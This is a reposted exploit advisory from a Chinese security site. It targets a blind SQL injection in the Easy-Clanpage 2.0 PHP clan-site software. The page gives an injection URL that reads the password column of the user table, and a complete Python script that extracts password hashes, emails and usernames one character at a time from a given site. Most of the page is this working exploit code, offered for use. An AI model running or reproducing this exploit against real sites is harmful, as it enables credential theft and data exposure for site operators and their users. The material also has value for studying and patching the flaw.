首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Easy-Clanpage version 2.0 remote profile page blind SQL injection exploit
来源:vfocus.net 作者:Laster 发布时间:2010-03-25  
----------------------------Information------------------------------------------------
+Name : Easy-Clanpage <= v2.0 Blind SQL Injection Exploit
+Autor : Easy Laster
+Date   : 24.03.2010
+Script  : Easy-Clanpage v2.0
+Download : http://www.easy-clanpage.de/?section=downloads&action=viewdl&id=12
+Demo : http://capu87.ca.funpic.de/
+Price : for free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://localhost/ecp_version2/?section=user&action=details&func=stats&id=

#BLind SQL Injection 
+Exploitable   : http://localhost/ecp_version2/?section=user&action=details&func=stats&id=
1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))>1
-----------------------------------------------------------------------------------------
#Blind SQL Injection Exploit

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, getopt

def out(str):
    sys.stdout.write(str)
    sys.stdout.flush()

class Exploit:
    charset = "0123456789abcdefABCDEF"
    url = ""
    charn = 1
    id = 1
    table_prefix = ""
    table_field = ""
    passwd = ""
    columns = []
    find_passwd = True

    def __init__(self):
        if len(sys.argv) < 2:
            print "*****************************************************************************"
            print "******************** Easy-Clanpage V2.0 Profil Page Hack ********************"
            print "*****************************************************************************"
            print "*                Discovered and vulnerability by Easy Laster                *"
            print "*                             coded by Dr.ChAoS                             *"
            print "*****************************************************************************"
            print "* Usage:                                                                    *"
            print "* python exploit.py [OPTION...] [SWITCH...] <url>                           *"
            print "*                                                                           *"
            print "* Example:                                                                  *"
            print "*                                                                           *"
            print "* Get the password of the user with id 2:                                   *"
            print "* python exploit.py -id 2 http://site.de/ecp/                               *"
            print "*                                                                           *"
            print "* Get email and username of id 1:                                           *"
            print "* python exploit.py -columns 80:email,25:username -nopw http://site.de/ecp/ *"
            print "*                                                                           *"
            print "* Switches:                                                                 *"
            print "* --nopw                                  Search no password                *"
            print "*                                                                           *"
            print "* Options:                                                                  *"
            print "* --id=<user id>                          User id                           *"
            print "* --prefix=<table prefix>                 Table prefix of ECP               *"
            print "* --columns=<max_chars:column_name,...>   Get value of any column you want  *"
            print "*****************************************************************************"
            exit()
        opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "columns=", "nopw"])
        for opt in opts:
            if opt[0] == "--id":
                self.id = int(opt[1])
            elif opt[0] == "--prefix":
                self.table_prefix = opt[1]
            elif opt[0] == "--columns":
                for col in opt[1].split(","):
                    max, name = col.split(":")
                    self.columns.append([max, name, ""])
            elif opt[0] == "--nopw":
                self.find_passwd = False
        for switch in switches:
            if switch[:4] == "http":
                if switch[-1:] == "/":
                    self.url = switch
                else:
                    self.url = switch + "/"
    def generate_url(self, ascii):
        return self.url + "index.php?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "ecp_user%20WHERE%20userID=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii))
    def start(self):
        print "Exploiting..."
        if self.find_passwd:
            self.password()
        if len(self.columns) > 0:
            self.read_columns()
        print "All finished!\n"
        print "------ Results ------"
        if len(self.columns) > 0:
            for v in self.columns:
                print "Column \"" + v[1] + "\": " + v[2]
        if self.find_passwd:
            if len(self.passwd) == 32:
                print "Password: " + self.passwd
            else:
                print "Password not found!"
        print "--------------------"
    def read_columns(self):
        end = False
        charrange = [0]
        charrange.extend(range(32, 256))
        for i in range(len(self.columns)):
            out("Getting value of \"" + self.columns[i][1] + "\": ")
            self.table_field = self.columns[i][1]
            for pwc in range(1, int(self.columns[i][0]) + 1):
                if end == True:
                    break
                self.charn = pwc
                end = False
                for c in charrange:
                    src = urllib2.urlopen(self.generate_url(chr(c))).read()
                    if "<b>Warning</b>:  mysql_result() [" in src:
                        if c == 0:
                            end = True
                        else:
                            self.columns[i][2] += chr(c)
                            out(chr(c))
                        break
            out("\n")
    def password(self):
        out("Getting password: ")
        self.table_field = "password"
        for pwc in range(1, 33):
            self.charn = pwc
            for c in self.charset:
                src = urllib2.urlopen(self.generate_url(c)).read()
                if "<b>Warning</b>:  mysql_result() [" in src:
                    self.passwd += c
                    out(c)
                    break
        out("\n")

exploit = Exploit()
exploit.start()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MX Simulator Server Remote Buf
·xwine v1.0.1 (.exe file) Local
·Jinais IRC Server 0.1.8 - NULL
·Smart PC Recorder 4.8 .MP3 Loc
·PDF File Standard Fuzzer
·win32/xp sp3 (Ru) WinExec+Exit
·phpAuthentAdmin permanent XSS
·Shellcode - Win32 MessageBox (
·FreeSSHD 1.2.4 Remote Buffer O
·瑞星最新0day漏洞
·Donar Player 2.2.0 Local Crash
·Internet Explorer 7.0 0day
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved